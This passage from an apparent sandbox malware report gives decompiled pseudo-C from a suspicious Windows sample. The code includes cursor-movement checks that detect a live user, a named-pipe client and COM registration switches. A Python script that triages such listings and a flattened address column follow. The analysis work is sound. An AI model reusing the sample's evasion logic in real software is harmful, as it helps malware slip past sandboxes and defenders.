    						_t738 =  *0x442aa8; // 0x0
    						asm("cdq");
    						if(_t738 /  &(_t824[0x3d]) ==  *(_t1102 + 0xb4)) {
    							_t1087 =  *0x442a98; // 0x0
    						} else {
    							 *(_t1102 + 0xb4) =  *0x442aac & 0x000000ff;
    						}
    						WaitForSingleObject( *(_t1102 + 0x70), 0xbb7);
    						_t185 = _t1102 + 0x1c;
    						 *_t185 =  *(_t1102 + 0x1c) - 1;
    						_t1141 =  *_t185;
    						if( *_t185 != 0) {
    							continue;
    						} else {
    							break;
    						}
    					}
    				}
    				L004084F0(_t1102 + 0x70, _t1037, _t1058, _t1141);
    				 *(_t1102 + 0x50) =  *(_t1102 + 0x4c);
    				L0040FAE0(_t1102 + 0x74, _t1141, _t1102 + 0x4c);
    				 *(_t1102 + 0x4c) =  *(_t1102 + 0x34);
    				E0040FB30(_t1102 + 0x74, _t1141, _t1102 + 0x4c);
    				if((_t1087 & 0x0000ffff) <  *(_t1102 + 0x90) - ( *(_t1102 + 0x6c) & 0x000000ff)) {
    					_t910 =  *0x442aa0; // 0x0
    					asm("cdq");
    					 *0x442a94 =  &(( &(_t782[ *(_t1102 + 0x34) /  &(_t910[0x35])]))[ *0x442aa4 & 0x000000ff]);
    				}
    				L004098D0(_t1102 + 0x70);
    				E0040FAA0(_t1102 + 0x70, _t1037);
    				 *((intOrPtr*)(_t1102 + 0x7c)) = 2;
    				 *(_t1102 + 0x28) = 0;
    				 *((char*)(_t1102 + 0xec)) = 0;
    				E00422840(_t1102 + 0xe5, 0, 0x2f);
    				_t1103 = _t1102 + 0xc;
    				do {
    					_t539 = WaitNamedPipeA("\\\\.\\pipe\\pipe", 0xffffffff); // executed
    					if(_t539 == 0) {
    						 *0x442a98 = 1;
    					}
    					_t540 = CreateFileA("\\\\.\\pipe\\pipe", 0xc0000000, 0, 0, 3, 0, 0); // executed
    					_t1059 = _t540;
    				} while ( *0x442aa4 == 0 && _t1059 == 0xffffffff);
    				_t541 = SetNamedPipeHandleState(_t1059, _t1103 + 0x78, 0, 0); // executed
    				if(_t541 == 0) {
    					CloseHandle(_t1059);
    				}
    				_t1039 =  *0x4331ec;
    				do {
    					_t542 = WriteFile(_t1059, "1", 0x30, _t1103 + 0x20, 0); // executed
    					if(_t542 == 0) {
    						CloseHandle(_t1059);
    					}
    					_t544 = ReadFile(_t1059, _t1103 + 0xec, 0x30, _t1103 + 0x20, 0); // executed
    					if(_t544 == 0) {
    						CloseHandle(_t1059);
    					}
    				} while ( *0x442aac == 0 ||  *0x442aa4 == 0 ||  *(_t1103 + 0x6c) == 0);
    				_t960 = _t1103 + 0x5c;
    				 *(_t1103 + 0x2c) = 0;
    				 *((intOrPtr*)(_t1103 + 0x64)) = 0;
    				LookupAccountNameA(_t1103 + 0x4f4, _t1103 + 0x4f4, 0, _t1103 + 0x5c, 0, _t1103 + 0x1c, _t1103 + 0x70); // executed
    				_t785 =  *0x433268;
    				_t548 = GetLastError();
    				_t1153 = _t548 - 0x534;
    				if(_t548 != 0x534) {
    					__eflags = GetLastError() - 0x7a;
    					if(__eflags == 0) {
    						_t1010 =  *(_t1103 + 0x50);
    						_t1075 =  *0x4331f4;
    						_t1051 = LocalAlloc(0x40,  *(_t1103 + 0x50));
    						__eflags = _t1051;
    						if(__eflags == 0) {
    							_push(GetLastError());
    							_push(L"LocalAlloc failed with %d\n");
    							L004242F0(_t785, _t1010, _t1051, _t1075, __eflags);
    							_t1103 = _t1103 + 8;
    						}
    						_t1076 = LocalAlloc(0x40,  *(_t1103 + 0x18));
    						__eflags = _t1076;
    						if(__eflags == 0) {
    							_push(GetLastError());
    							_push(L"LocalAlloc failed with %d\n");
    							L004242F0(_t785, _t1010, _t1051, _t1076, __eflags);
    							_t1103 = _t1103 + 8;
    						}
    						_t909 = _t1103 + 0x4f4;
    						_t1012 = _t909;
    						__eflags = LookupAccountNameA(_t909, _t909, _t1051, _t1103 + 0x5c, _t1076, _t1103 + 0x1c, _t1103 + 0x70);
    						if(__eflags == 0) {
    							_push(GetLastError());
    							_push(L"LookupAccountName failed with %d\n");
    							L004242F0(_t785, _t1012, _t1051, _t1076, __eflags);
    							_t1103 = _t1103 + 8;
    						}
    						__eflags = _t1076;
    						if(__eflags != 0) {
    							LocalFree(_t1076);
    						}
    					}
    				} else {
    					_push(GetLastError());
    					_push(L"LookupAccountName failed with %d\n");
    					L004242F0(_t785, _t960, _t1039, _t1059, _t1153);
    					_t1103 = _t1103 + 8;
    				}
    				_t837 =  *(_t1103 + 0x8c8);
    				_t786 =  *(_t1103 + 0x8bc);
    				_t1040 =  *0x4330d4;
    				 *(_t1103 + 0x60) = 0;
    				 *(_t1103 + 0x5c) = 0;
    				 *(_t1103 + 0x60) = 0;
    				 *((intOrPtr*)(_t1103 + 0x58)) = 0;
    				_t1060 = 9;
    				 *(_t1103 + 0xc8) = 0;
    				 *(_t1103 + 0x1c) = _t837;
    				 *(_t1103 + 0x5c) = 0;
    				 *(_t1103 + 0x60) = 0;
    				 *(_t1103 + 0x24) = 5;
    				 *(_t1103 + 0x28) = 0x36;
    				 *(_t1103 + 0x20) = 0 -  *(_t1103 + 0xc0) * _t837;
    				do {
    					E00410910(_t786, _t1103 + 0xb0, _t1040, 0, 0);
    					_push(0);
    					_push(_t1103 + 0x28);
    					_t554 = L0040E750(_t1103 + 0xb8, 0);
    					E00408FE0(_t786, _t1103 + 0xbc);
    					_t556 =  *0x442aa4; // 0x0
    					 *(_t1103 + 0xcc) = _t556;
    					_push(L0040E750(_t1103 + 0xb8, 0, _t1103 + 0xc8, 0, _t1103 + 0x78, _t554));
    					_push(_t1103 + 0x84);
    					E00408FE0(_t786, _t1103 + 0xbc);
    					L00409900(_t1103 + 0xb0);
    					SetStretchBltMode(0, 4);
    					L004107E0();
    					_t1060 = _t1060 - 1;
    					_t1155 = _t1060;
    				} while (_t1060 != 0);
    				_t1041 = 0;
    				_t1062 =  *(_t1103 + 0x34) + ( *(_t1103 + 0x6c) + 1) * 2 +  *(_t1103 + 0x6c) + 1;
    				SetAbortProc(0, 0x4047a0);
    				 *((intOrPtr*)(_t1103 + 0x44)) = 0;
    				 *((intOrPtr*)(_t1103 + 0x48)) = 0;
    				 *((intOrPtr*)(_t1103 + 0x4c)) = 0;
    				 *((intOrPtr*)(_t1103 + 0x48)) = 0;
    				DrawFrameControl( *(_t1103 + 0x70), _t1103 + 0x40, 4, 0x4210);
    				L004084F0(_t1103 + 0xc4, 0, _t1062, _t1155);
    				if(_t1062 <= 0) {
    					L91:
    					_t1092 = 0;
    					LoadImageA( *(_t1103 + 0x8bc),  *(_t1103 + 0xc0) & 0x0000ffff, 0, 0, 0, 0);
    					_t1042 =  *( *(_t1103 + 0xc4));
    					if(_t1062 <= 0) {
    						L95:
    						E00417E60(_t1103 + 0x54, _t1042, 0);
    						_push(_t1103 + 0x24);
    						_push(_t1103 + 0x74);
    						 *(_t1103 + 0x2c) = 0x7a;
    						 *(_t1103 + 0x30) = 0x30;
    						L00410520(_t786, _t1103 + 0x5c, 0);
    						_t853 =  *0x442aa0; // 0x0
    						asm("cdq");
    						_t290 =  &(_t853[0x56]); // 0x56
    						_t1043 = _t290;
    						_t787 =  *(_t1103 + 0x68);
    						_t1044 =  *(_t1103 + 0x84);
    						_t1163 = 0 / _t1043 * _t787;
    						if(0 / _t1043 * _t787 == 0) {
    							_t1044 =  *(_t1103 + 0x1c);
    						}
    						_t300 =  *(_t1103 + 0x34) + 0x8e; // 0x8e
    						_t1063 =  *((intOrPtr*)(_t1103 + 0x98));
    						L004047B0(_t1181, _t1063, _t1062,  &(_t853[_t300]));
    						_push(_t1103 + 0x24);
    						_push(_t1103 + 0x74);
    						_t855 = _t1103 + 0x5c;
    						 *(_t1103 + 0x2c) = _t1044;
    						 *(_t1103 + 0x30) = 0x76d;
    						L00410520(_t787, _t1103 + 0x5c, _t1163);
    						if(_t787 != 1) {
    							 *((intOrPtr*)(_t1063 + 1)) = _t1103 + 0x8bc;
    						}
    						asm("fild dword [esp+0x20]");
    						_t580 = L00424780(_t855, _t1181);
    						asm("fisub dword [esp+0x88]");
    						 *(_t1103 + 0xc0) = L00424690(_t580, _t1181 *  *0x4363f8 +  *0x4363f0 -  *0x436400);
    						E004179D0();
    						E0040FAA0(_t1103 + 0xc4, _t1044);
    						_t1045 =  *(_t1103 + 0x8c8);
    						_t788 = 0;
    						 *(_t1103 + 0x68) = 0;
    						 *(_t1103 + 0x6c) = 0;
    						 *(_t1103 + 0x68) = 0;
    						 *(_t1103 + 0x6c) = 0;
    						 *(_t1103 + 0x70) = 0;
    						 *(_t1103 + 0xc4) = 0;
    						 *(_t1103 + 0xc8) = 0;
    						 *(_t1103 + 0xcc) = 0;
    						 *(_t1103 + 0x94) = _t1092;
    						 *(_t1103 + 0x28) = _t1092;
    						 *(_t1103 + 0x60) = _t1092;
    						 *(_t1103 + 0x34) = _t1092;
    						 *(_t1103 + 0x38) = _t1092;
    						 *(_t1103 + 0xd4) = _t1092;
    						 *(_t1103 + 0xd8) = _t1092;
    						 *(_t1103 + 0x74) = CreateEventA(_t1092, _t1092, _t1092, "denfers");
    						GetCursorPos(_t1103 + 0x24);
    						_t1064 =  *(_t1103 + 0x10);
    						while(1) {
    							_t971 =  *0x442aa0; // 0x0
    							if(_t971 -  *(_t1103 + 0x68) >= _t788) {
    								_t702 =  *0x442aac; // 0x0
    								 *0x442a94 = _t702 +  *(_t1103 + 0x20);
    							}
    							GetCursorPos(_t1103 + 0xc4);
    							 *(_t1103 + 0x50) =  *(_t1103 + 0x50) + 1;
    							_t790 = 5;
    							do {
    								 *0x442a98 =  *0x442a98 + DragQueryFileA(0, 0xffffffff, _t1103 + 0x3b0, 0x104);
    								_t859 =  *0x442aa0; // 0x0
    								if(_t1045 /  &(_t859[0x61]) * _t1092 != 0) {
    									_t902 =  *0x442aa4; // 0x0
    									asm("cdq");
    									_t1045 = (_t1064 & 0x0000ffff) / (_t902 + 0x44);
    								}
    								_t790 = _t790 - 1;
    							} while (_t790 != 0);
    							_t594 =  *(_t1103 + 0xc4);
    							_t861 =  *(_t1103 + 0xc8);
    							if( *(_t1103 + 0x24) != _t594 ||  *(_t1103 + 0x28) != _t861) {
    								 *(_t1103 + 0x84) =  &(( *(_t1103 + 0x84))[1]);
    								 *(_t1103 + 0x24) = _t594;
    								 *(_t1103 + 0x28) = _t861;
    							}
    							if( *(_t1103 + 0xb4) != 0) {
    								_t358 = _t1103 + 0xb4;
    								 *_t358 =  *(_t1103 + 0xb4) -  *(_t1103 + 0xc0);
    								__eflags =  *_t358;
    							} else {
    								 *(_t1103 + 0x5c) =  *(_t1103 + 0x5c) + ( *0x442aa8 & 0x0000ffff);
    							}
    							_t1065 =  *(_t1103 + 0x84);
    							if(_t1065 != 0) {
    								 *(_t1103 + 0x18) =  *(_t1103 + 0x18) + 1;
    								_push(_t1103 + 0x7c);
    								_push(0);
    								L00432D08();
    							}
    							if(_t1065 > 1 ||  *(_t1103 + 0x18) > 4) {
    								L120:
    								_t791 =  *(_t1103 + 0x68);
    								 *0x442a94 =  *0x442a94 + (0x38e38e39 *  *(_t1103 + 0x6c) >> 0x20 >> 3 >> 0x1f) + (0x38e38e39 *  *(_t1103 + 0x6c) >> 0x20 >> 3) - ( *0x442aa8 & 0x000000ff) -  *0x442aac +  *(_t1103 + 0x38) +  *(_t1103 + 0xc8);
    								EnableMenuItem(_t791, 0xc, 0);
    								__eflags =  *(_t1103 + 0x8bc);
    								if( *(_t1103 + 0x8bc) == 0) {
    									 *(_t1103 + 0x3c) = 0;
    									 *(_t1103 + 0x90) = 0;
    									 *((intOrPtr*)(_t1103 + 0x58)) = 0;
    									 *((intOrPtr*)(_t1103 + 0x8c)) = 0;
    									 *(_t1103 + 0x20) = 0;
    									 *0x433608(0, 2);
    									_t1071 =  *0x433604;
    									_t635 =  *_t1071(0x433ffc, 0, 1, 0x43a508, _t1103 + 0x34);
    									_t1049 =  *0x4335b8;
    									__eflags = _t635;
    									if(_t635 < 0) {
    										 *_t1049();
    									}
    									_t636 =  *(_t1103 + 0x34);
    									_t638 =  *((intOrPtr*)( *(_t636->nLength)))(_t636, 0x433fdc, _t1103 + 0x88);
    									__eflags = _t638;
    									if(_t638 < 0) {
    										_t686 =  *(_t1103 + 0x34);
    										 *((intOrPtr*)( *((intOrPtr*)(_t686->nLength + 8))))(_t686);
    										 *_t1049();
    									}
    									_t639 =  *(_t1103 + 0x34);
    									_t641 =  *((intOrPtr*)( *(_t639->nLength)))(_t639, 0x433fec, _t1103 + 0x50);
    									__eflags = _t641;
    									if(_t641 < 0) {
    										_t681 =  *((intOrPtr*)(_t1103 + 0x88));
    										 *((intOrPtr*)( *((intOrPtr*)( *_t681 + 8))))(_t681);
    										_t683 =  *(_t1103 + 0x34);
    										 *((intOrPtr*)( *((intOrPtr*)(_t683->nLength + 8))))(_t683);
    										 *_t1049();
    									}
    									_t643 =  *_t1071(_t1103 + 0x64, 0, 1, 0x43a4f8, _t1103 + 0x84);
    									__eflags = _t643;
    									if(_t643 >= 0) {
    										_t661 =  *(_t1103 + 0x34);
    										_t662 =  *((intOrPtr*)( *((intOrPtr*)(_t661->nLength + 0xc))))(_t661,  *(_t1103 + 0x84), L"Push Source");
    										__eflags = _t662;
    										if(_t662 >= 0) {
    											_t668 =  *_t1071(0x43400c, 0, 1, 0x43a4f8, _t1103 + 0x18);
    											__eflags = _t668;
    											if(_t668 >= 0) {
    												_t669 =  *(_t1103 + 0x34);
    												_t671 =  *((intOrPtr*)( *((intOrPtr*)(_t669->nLength + 0xc))))(_t669,  *(_t1103 + 0x18), L"Enhanced Video Renderer");
    												__eflags = _t671;
    												if(_t671 >= 0) {
    													_t672 =  *(_t1103 + 0x34);
    													 *((intOrPtr*)( *((intOrPtr*)(_t672->nLength + 0x30))))(_t672, 0);
    													_t674 =  *((intOrPtr*)(_t1103 + 0x88));
    													_t675 =  *((intOrPtr*)( *((intOrPtr*)( *_t674 + 0x1c))))(_t674);
    													__eflags = _t675;
    													if(_t675 >= 0) {
    														_t678 =  *(_t1103 + 0x50);
    														 *((intOrPtr*)( *((intOrPtr*)( *_t678 + 0x24))))(_t678, 0x2710, _t1103 + 0x70);
    													}
    													_t676 =  *((intOrPtr*)(_t1103 + 0x88));
    													 *((intOrPtr*)( *((intOrPtr*)( *_t676 + 0x24))))(_t676);
    												}
    											}
    										}
    										_t663 =  *(_t1103 + 0x84);
    										__eflags = _t663;
    										if(_t663 != 0) {
    											 *((intOrPtr*)( *((intOrPtr*)( *_t663 + 8))))(_t663);
    										}
    										_t664 =  *(_t1103 + 0x18);
    										__eflags = _t664;
    										if(_t664 != 0) {
    											 *((intOrPtr*)( *((intOrPtr*)( *_t664 + 8))))(_t664);
    										}
    									}
    									_t644 =  *((intOrPtr*)(_t1103 + 0x88));
    									 *((intOrPtr*)( *((intOrPtr*)( *_t644 + 8))))(_t644);
    									_t646 =  *(_t1103 + 0x50);
    									 *((intOrPtr*)( *((intOrPtr*)( *_t646 + 8))))(_t646);
    									_t648 =  *(_t1103 + 0x34);
    									 *((intOrPtr*)( *((intOrPtr*)(_t648->nLength + 8))))(_t648);
    									 *0x4335b8();
    									_t651 =  *0x442a98; // 0x0
    									_t1072 =  *0x442aa0; // 0x0
    									_t652 = GetDlgItem(0, _t651);
    									 *0x4335d0(0);
    									_t1096 =  *0x4335bc;
    									 *_t1096(_t1072, 1, 0);
    									 *0x4335c0(_t652, _t1072);
    									 *0x4335c4(GetTopWindow(0));
    									 *_t1096(_t1072, 0, 1);
    									__eflags =  *0x442aa0;
    									if( *0x442aa0 != 0) {
    										 *((intOrPtr*)( *((intOrPtr*)( *_t1072 + 8))))(_t1072);
    									}
    									 *0x4335cc();
    								}
    								E00422840(_t1103 + 0xe4, 0, 0x30);
    								_t1046 =  *(_t1103 + 0x78);
    								_t1104 = _t1103 + 0xc;
    								 *(_t1104 + 0xf0) = 0x30;
    								 *(_t1104 + 0xf4) = 1;
    								 *((intOrPtr*)(_t1104 + 0xfc)) = 0;
    								_t601 = SetMenuItemInfoA(_t791, _t1046, 0, _t1104 + 0xe0);
    								__eflags = _t601;
    								if(_t601 != 0) {
    									DrawMenuBar(0);
    								} else {
    									GetLastError();
    								}
    								E00422840(_t1104 + 0xe4, 0, 0x30);
    								_t1105 = _t1104 + 0xc;
    								 *(_t1105 + 0xf0) = 0x30;
    								 *(_t1105 + 0xf4) = 1;
    								GetMenuItemInfoA(_t791, _t1046, 0, _t1105 + 0xe0);
    								_t1067 =  *0x442aa8; // 0x0
    								BeginPaint(_t1067, _t1105 + 0x15c);
    								EndPaint(_t1067, _t1105 + 0x15c);
    								 *(_t1105 + 0x164) = 1;
    								GetClientRect(_t1067, _t1105 + 0x164);
    								EnumDateFormatsA( *(_t1105 + 0x90), 0x400, 1);
    								__eflags = _t791 -  *0x442aa4; // 0x0
    								if(__eflags < 0) {
    									 *0x442aac =  *(_t1105 + 0x3ac + _t791 * 4);
    								}
    								_t1068 =  *(_t1105 + 0x14);
    								__eflags = _t1068;
    								if(_t1068 == 0) {
    									L157:
    									L00405200();
    									E00405010(4, 5);
    									 *0x4335c8();
    									__eflags =  *((char*)(_t1105 + 0x8f));
    									if(__eflags == 0) {
    										_push( *((intOrPtr*)(_t1105 + 0x8c8)));
    										_push( *((intOrPtr*)(_t1105 + 0x8c4)));
    										_t614 = L004198E0(_t791, __eflags);
    										_t1105 = _t1105 + 8;
    										_t1069 = _t614;
    									} else {
    										 *(_t1105 + 0xe0) = 0x435a4c;
    										 *((intOrPtr*)(_t1105 + 0xe4)) = 0;
    										 *((intOrPtr*)(_t1105 + 0xe8)) = 0;
    										 *((intOrPtr*)(_t1105 + 0xec)) = 0;
    										 *(_t1105 + 0xf0) = 0;
    										 *(_t1105 + 0xf4) = 0;
    										 *((intOrPtr*)(_t1105 + 0xf8)) = 0;
    										_t620 = L004050E0(_t1105 + 0xe0);
    										_t463 = _t1105 + 0xe0; // 0x435a4c
    										_t1069 = _t620;
    										L00406820(_t463);
    									}
    									L004050A0(0x442ad8);
    									_t616 =  *0x442b20; // 0x0
    									Sleep(_t616);
    								} else {
    									while(1) {
    										_t622 = lstrcmpiA(_t1068, "UnregServer");
    										__eflags = _t622;
    										if(_t622 == 0) {
    											break;
    										}
    										_t625 = lstrcmpiA(_t1068, "RegServer");
    										__eflags = _t625;
    										if(_t625 == 0) {
    											L0040F280(0x442ad8, 0x64, 1, 0);
    											_t1069 = L00409210(0x442ad8, 1, 0);
    											L161:
    											L004093B0(0x442ad8);
    											 *0x4335b8();
    											return _t1069;
    										}
    										_t628 = lstrcmpiA(_t1068, "Automation");
    										__eflags = _t628;
    										if(_t628 == 0) {
    											L156:
    											 *((char*)(_t1105 + 0x8f)) = 1;
    											goto L157;
    										}
    										_t629 = lstrcmpiA(_t1068, "Embedding");
    										__eflags = _t629;
    										if(_t629 == 0) {
    											goto L156;
    										}
    										_t1068 = E00403D10(_t1068, _t1105 + 0xd4);
    										_t1105 = _t1105 + 8;
    										__eflags = _t1068;
    										if(_t1068 != 0) {
    											continue;
    										}
    										goto L157;
    									}
    									L0040F280(0x442ad8, 0x64, 0, 0);
    									_t1069 = L004092A0(0x442ad8, 1, 0);
    								}
    								goto L161;
    							} else {
    								 *(_t1103 + 0x3c) = 0;
    								 *(_t1103 + 0x40) = 0;
    								 *((intOrPtr*)(_t1103 + 0x44)) = 0;
    								 *((intOrPtr*)(_t1103 + 0x48)) = 0;
    								CreateRectRgnIndirect(_t1103 + 0x38);
    								if( *(_t1103 + 0x50) > 0xa) {
    									goto L120;
    								}
    								if((0x10a22d39 * ( *0x442a94 & 0x0000ffff) >> 0x20 >> 7 >> 0x1f) + (0x10a22d39 * ( *0x442a94 & 0x0000ffff) >> 0x20 >> 7) <= 1) {
    									 *0x442a94 =  *(_t1103 + 0x6c);
    								}
    								WaitForSingleObject( *(_t1103 + 0x70), 0xbb6);
    								_t788 =  *(_t1103 + 0xb4);
    								_t1064 = 0 - ( *0x442aa8 & 0x0000ffff) * _t1092 + _t1045;
    								continue;
    							}
    						}
    					}
    					asm("fild dword [esp+0x68]");
    					_t786 =  *0x433408;
    					 *(_t1103 + 0x70) = _t1181;
    					do {
    						SetWindowLongA(0, 0xffffffec, 0x80);
    						asm("fld1");
    						_t904 =  *(_t1103 + 0x90);
    						_push(_t904);
    						 *_t1103 = _t1181;
    						 *((char*)(_t1092 + _t904)) =  *((intOrPtr*)(_t1042 + 8));
    						L00404710( *((intOrPtr*)(_t1042 + 8)));
    						_t1042 =  *_t1042;
    						asm("fnstcw word [esp+0x50]");
    						_t1181 = _t1181 *  *(_t1103 + 0x74) *  *0x436400;
    						 *(_t1103 + 0x80) =  *(_t1103 + 0x50) & 0x0000ffff | 0x00000c00;
    						_t1092 =  &(_t1092->nLength);
    						asm("fldcw word [esp+0x80]");
    						_t1103 = _t1103 + 4;
    						asm("fistp qword [esp+0x24]");
    						 *(_t1103 + 0x1c) =  *(_t1103 + 0x24);
    						asm("fldcw word [esp+0x4c]");
    					} while (_t1092 < _t1062);
    					_t1092 = 0;
    					goto L95;
    				} else {
    					goto L88;
    				}
    				do {
    					L88:
    					_t905 =  *0x442aa0; // 0x0
    					asm("cdq");
    					if(0 /  &(_t905[0x5d]) *  *(_t1103 + 0x90) != 0) {
    						 *0x442a94 =  *0x442a94 - _t786;
    						_t1158 =  *0x442a94;
    					}
    					_t270 = _t1041 + 0x434020; // 0x434020
    					E0040FB30(_t1103 + 0xc8, _t1158, _t270);
    					_t1041 =  &(_t1041->i);
    				} while (_t1041 < _t1062);
    				goto L91;
    			}
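The decompiled function above is long, but most of what an analyst needs from it is a handful of Win32 calls and the literals passed to them: two `GetCursorPos` polling loops that compare cursor positions between timed `WaitForSingleObject` calls (a pattern commonly used to check for a live user), a named-pipe client that loops on `WaitNamedPipeA`/`CreateFileA`/`WriteFile`/`ReadFile` against `\\.\pipe\pipe`, the two-call `LookupAccountNameA` idiom keyed on `GetLastError()` returning 0x7a (ERROR_INSUFFICIENT_BUFFER) and 0x534 (ERROR_NONE_MAPPED), `LoadLibraryA("open")` with a module name that is not a real library, named events `Xstore` and `denfers`, and ATL-style `lstrcmpiA` checks for the `RegServer`/`UnregServer`/`Automation`/`Embedding` switches. The following Python script is an added example, not code from the report or from the sample: it pulls those calls and literals out of a pseudo-C listing in the decompiler's format and groups them into behaviour classes. The grouping table and the error-code names are assumptions of the example (the two error-code values are the standard Win32 ones); the sample input is a constructed excerpt copied line for line from the listing above.

```python
"""Behaviour triage over decompiler output such as the Joe Sandbox listing above.

Added example, not code from the report or from the sample. It scans pseudo-C
lines for Win32 API calls and their string literals and groups them into the
behaviour classes an analyst triages first. Assumption: the listing follows the
decompiler's conventions seen above (API calls written as Name(...), internal
functions named like E00422A18 / L00421DD8, and '// executed' on lines the
sandbox observed running).
"""
import re
from collections import defaultdict

CALL_RE = re.compile(r"\b([A-Za-z][A-Za-z0-9]*)\(")
INTERNAL_RE = re.compile(r"^[EL][0-9A-F]{8}$")      # decompiler-named internal functions
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')      # C string literal, escapes kept
HEX_RE = re.compile(r"0x[0-9a-fA-F]+")
KEYWORDS = {"if", "while", "for", "switch", "asm", "return", "sizeof"}

# Assumed grouping (the example's own choice); unlisted APIs land in "other".
BEHAVIOUR_CLASSES = {
    "timing/evasion": {"GetCursorPos", "WaitForSingleObject", "Sleep", "GetTickCount"},
    "named-pipe IPC": {"WaitNamedPipeA", "CreateFileA", "SetNamedPipeHandleState",
                       "WriteFile", "ReadFile"},
    "account lookup": {"LookupAccountNameA", "LookupAccountSidA", "GetLastError"},
    "library loading": {"LoadLibraryA", "LoadLibraryW", "GetProcAddress"},
    "named sync objects": {"CreateEventA", "CreateMutexA", "CreateSemaphoreA"},
    "command-line switches": {"lstrcmpiA", "lstrcmpA"},
}
# Standard Win32 error codes: 122 = ERROR_INSUFFICIENT_BUFFER, 1332 = ERROR_NONE_MAPPED.
KNOWN_ERROR_CODES = {0x534: "ERROR_NONE_MAPPED", 0x7a: "ERROR_INSUFFICIENT_BUFFER"}
PIPE_PREFIX = "\\\\.\\pipe\\"   # \\.\pipe\  after C unescaping

# Constructed input: lines copied from the decompiled function in the report.
SAMPLE_LISTING = r'''
_t482 = LoadLibraryA("open"); // executed
_t483 = LoadIconA(_t482, 0x64);
 *((intOrPtr*)(_t1102 + 0x78)) = CreateEventA(_t1084, _t1084, _t1084, "Xstore");
GetCursorPos(_t1102 + 0x24);
GetCursorPos(_t1102 + 0xc4);
WaitForSingleObject( *(_t1102 + 0x70), 0xbb7);
_t539 = WaitNamedPipeA("\\\\.\\pipe\\pipe", 0xffffffff); // executed
_t540 = CreateFileA("\\\\.\\pipe\\pipe", 0xc0000000, 0, 0, 3, 0, 0); // executed
_t542 = WriteFile(_t1059, "1", 0x30, _t1103 + 0x20, 0); // executed
_t544 = ReadFile(_t1059, _t1103 + 0xec, 0x30, _t1103 + 0x20, 0); // executed
LookupAccountNameA(_t1103 + 0x4f4, _t1103 + 0x4f4, 0, _t1103 + 0x5c, 0, _t1103 + 0x1c, _t1103 + 0x70); // executed
_t548 = GetLastError();
if(_t548 != 0x534) {
__eflags = GetLastError() - 0x7a;
 *(_t1103 + 0x74) = CreateEventA(_t1092, _t1092, _t1092, "denfers");
_t622 = lstrcmpiA(_t1068, "UnregServer");
_t625 = lstrcmpiA(_t1068, "RegServer");
Sleep(_t616);
'''


def _unescape(literal):
    """Resolve C escapes such as \\\\ in a literal taken from the listing."""
    return literal.encode("latin-1", "backslashreplace").decode("unicode_escape")


def parse_calls(listing):
    """Return [(api, [string literals], executed)] for every Win32-looking call."""
    calls = []
    for line in listing.splitlines():
        executed = "// executed" in line
        matches = list(CALL_RE.finditer(line))
        for i, m in enumerate(matches):
            api = m.group(1)
            if api in KEYWORDS or INTERNAL_RE.match(api):
                continue
            # Literals between this call and the next call on the same line.
            end = matches[i + 1].start() if i + 1 < len(matches) else len(line)
            literals = [_unescape(s) for s in STRING_RE.findall(line[m.end():end])]
            calls.append((api, literals, executed))
    return calls


def summarize(listing):
    """Group the APIs seen into behaviour classes (sorted, deduplicated)."""
    seen = defaultdict(set)
    for api, _, _ in parse_calls(listing):
        cls = next((c for c, names in BEHAVIOUR_CLASSES.items() if api in names), "other")
        seen[cls].add(api)
    return {cls: sorted(names) for cls, names in seen.items()}


def string_arguments(listing):
    """Map each API to the string literals passed to it, in listing order."""
    out = defaultdict(list)
    for api, literals, _ in parse_calls(listing):
        out[api].extend(literals)
    return dict(out)


def pipe_paths(listing):
    """Named-pipe paths handed to any API, after unescaping."""
    return sorted({s for _, literals, _ in parse_calls(listing)
                   for s in literals if s.startswith(PIPE_PREFIX)})


def error_codes(listing):
    """Known Win32 error codes compared against GetLastError() results.

    Assumption: the comparison constant sits on the GetLastError line or the next one.
    """
    lines = listing.splitlines()
    found = {}
    for i, line in enumerate(lines):
        if "GetLastError" not in line:
            continue
        window = line + " " + (lines[i + 1] if i + 1 < len(lines) else "")
        for hex_const in HEX_RE.findall(window):
            value = int(hex_const, 16)
            if value in KNOWN_ERROR_CODES:
                found[value] = KNOWN_ERROR_CODES[value]
    return found


def executed_apis(listing):
    """APIs on lines the report marked '// executed', in listing order."""
    return [api for api, _, executed in parse_calls(listing) if executed]


def report(listing):
    """One-shot triage summary an analyst can eyeball or diff between samples."""
    return {"classes": summarize(listing), "strings": string_arguments(listing),
            "pipes": pipe_paths(listing), "error_codes": error_codes(listing),
            "executed": executed_apis(listing)}


if __name__ == "__main__":
    import json
    print(json.dumps(report(SAMPLE_LISTING), indent=2))
```

Feeding the script the full listing (for example by pasting the decompiled function into `SAMPLE_LISTING` or reading it from a file) gives the same summary for the whole function; the `executed` list is the part worth reading first, because it is built from the report's own `// executed` annotations and so separates calls the sandbox actually observed from code paths the decompiler merely recovered.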
Instruction address column for the decompiled function above (0x0041c95b through 0x0041d2ef): the report pairs one address with each source line, but extraction flattened the column and lost the per-line alignment, so the addresses are not reproduced here.
    0x0041d2f8
    0x0041d301
    0x0041d306
    0x0041d306
    0x0041d306
    0x0041d31e
    0x0041d321
    0x0041d323
    0x0041d336
    0x0041d33a
    0x0041d33e
    0x0041d348
    0x0041d34c
    0x0041d359
    0x0041d360
    0x0041d39a
    0x0041d3a9
    0x0041d3b1
    0x0041d3be
    0x0041d3c2
    0x0041d43b
    0x0041d43f
    0x0041d448
    0x0041d44d
    0x0041d452
    0x0041d45a
    0x0041d462
    0x0041d467
    0x0041d46f
    0x0041d470
    0x0041d470
    0x0041d475
    0x0041d479
    0x0041d483
    0x0041d485
    0x0041d487
    0x0041d487
    0x0041d48f
    0x0041d498
    0x0041d4a0
    0x0041d4a9
    0x0041d4ae
    0x0041d4af
    0x0041d4b3
    0x0041d4b7
    0x0041d4bf
    0x0041d4c7
    0x0041d4d0
    0x0041d4d0
    0x0041d4d3
    0x0041d4d7
    0x0041d4ee
    0x0041d4fe
    0x0041d505
    0x0041d511
    0x0041d516
    0x0041d525
    0x0041d528
    0x0041d52c
    0x0041d531
    0x0041d535
    0x0041d539
    0x0041d53d
    0x0041d544
    0x0041d54b
    0x0041d552
    0x0041d559
    0x0041d55d
    0x0041d561
    0x0041d565
    0x0041d569
    0x0041d570
    0x0041d582
    0x0041d586
    0x0041d58c
    0x0041d590
    0x0041d590
    0x0041d5a0
    0x0041d5a2
    0x0041d5ab
    0x0041d5ab
    0x0041d5b8
    0x0041d5be
    0x0041d5c2
    0x0041d5d0
    0x0041d5e7
    0x0041d5ed
    0x0041d601
    0x0041d603
    0x0041d60c
    0x0041d612
    0x0041d612
    0x0041d614
    0x0041d614
    0x0041d617
    0x0041d61e
    0x0041d629
